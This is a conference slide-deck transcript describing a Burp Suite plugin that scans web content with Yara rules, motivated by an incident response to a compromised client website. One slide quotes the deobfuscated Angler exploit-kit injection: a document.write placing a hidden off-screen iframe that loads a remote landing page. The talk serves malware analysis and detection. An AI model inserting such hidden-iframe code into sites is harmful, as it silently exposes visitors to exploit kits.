burpsuite yara
TRANSCRIPT
Burpsuite / Yara Integration
Ian DuffyPolito, Inc.@politoinc
Introduction
• Who am I?• About Burpsuite and Yara• Case study: A compromised website• Plugin development• Future Roadmap• Questions
Who am I?
• Former USAF network defender• Current cybersecurity consultant for Polito• Background in penetration testing (traditional
and web application) as well as Malware analysis
• Current duties involve malware analysis and threat hunting
Burpsuite
• Burpsuite is a MITM proxy tool for viewing, intercepting, modifying, and transmitting HTTP(S) requests and responses.
• Allows the user to view all web content down to the byte level, to include static pages, JavaScript, JSON, WebSockets, and much more.
• Includes several tools for assessing the security of web applications
BurpSuite
Yara
• Yara is a sophisticated pattern matching tool• Specifies a language for describing strings,
binary / hexadecimal data, file offset information, file structure information in order to write pattern matching rules
• Rules can be run against one or many files or data streams in order to find matches
Yara Rules Example
Case Study
• Client contacts Polito and says that their IT department is getting phone calls stating that their website is causing “FireEye Alerts” and is likely compromised
• Polito is asked to investigate and determine:– Whether the site is actually compromised– If so, scope, scale, and impact of the compromise
Case Study
• We request a tarball of the current webroot folder and a dump of any backend CMS databases
• In the meantime we begin spidering the website using Burpsuite…
Case Study
Highly obfuscated JavaScript – interesting…
Case Study
• The obfuscated JavaScript is consistent with the Angler Exploit Kit, which matches the alerts reported by our client’s IT department
• After deobfuscation of the JavaScript we see the following:
document.write('<style>.ddidfodevxgsz{position:absolute;top:-907px;width:300px;height:300px;}</style><div class="ddidfodevxgsz"><iframe src="http://ryonfmza.buildera.cf/consent/knife-lodge-19720974" width="250" height="250"></iframe></div>');
Case Study
Case Study
• Problems:– How do we identify whether this EK landing page /
malicious JavaScript has been inserted into any other pages on the site?
– How do we identify whether the attackers have left themselves a back door?
Case Study
• Possible Solutions– Wait for three days before client can get tarball of
their website uploaded to our SFTP server– Manually search through online web content– Write something to automate our searching
Writing Burpsuite Plugins
• Burpsuite supports plugins in Java, Ruby, and Python– Ruby requires JRuby– Python requires Jython
• We decided to use Python to develop our Yara integration for expedience
The Plugin…
• Burpsuite specifies several interfaces for performing various tasks
• Depending on what functionality we are trying to implement, we must implement one or more of those interfaces
• The interfaces specify methods that must be implemented in order to handle events from the Burpsuite UI
The Plugin…
• Each of the interfaces requires specific methods be implemented– IBurpExtender requires a method named
registerExtenderCallbacks– Itab requires methods named getTabCaption and
getUIComponent• Documentation for the interfaces is available
at:– https://portswigger.net/burp/extender/api/index.html
The Plugin…
• Our basic use case was as follows:– Burpsuite user spiders a website to retrieve as
much of the content as possible– User right-clicks on website in Burp UI and selects
“Scan with Yara”– Yara is used to scan the content of the web
requests and responses– Results displayed to user in a Tab
Jython
• Jython is a hybrid between Java and Python• You can “import” Java classes, instantiate Java
objects, and call their methods via Python code:
Jython
• Java objects are instantiated by calling a contructor method with the same name as the class– No “new” keyword like in Java– Parameters to the constructors are the same
• Once instantiated, class objects can be used just as with Java
Demonstration
Live demo time – this always works!
Future Roadmap
• Things that we are looking into:– Live Yara scanning as you surf– Persistent configuration settings– Multiple rules files
• Your thoughts and feature requests are most welcome!
Grab a Copy
• Plugin is available on our Github site:• https://github.com/PolitoInc/Yara-Scanner
• Please send any feedback to [email protected]
Questions?
Ian DuffyPolito, Inc.@politoinc
www.politoinc.com
Thank You!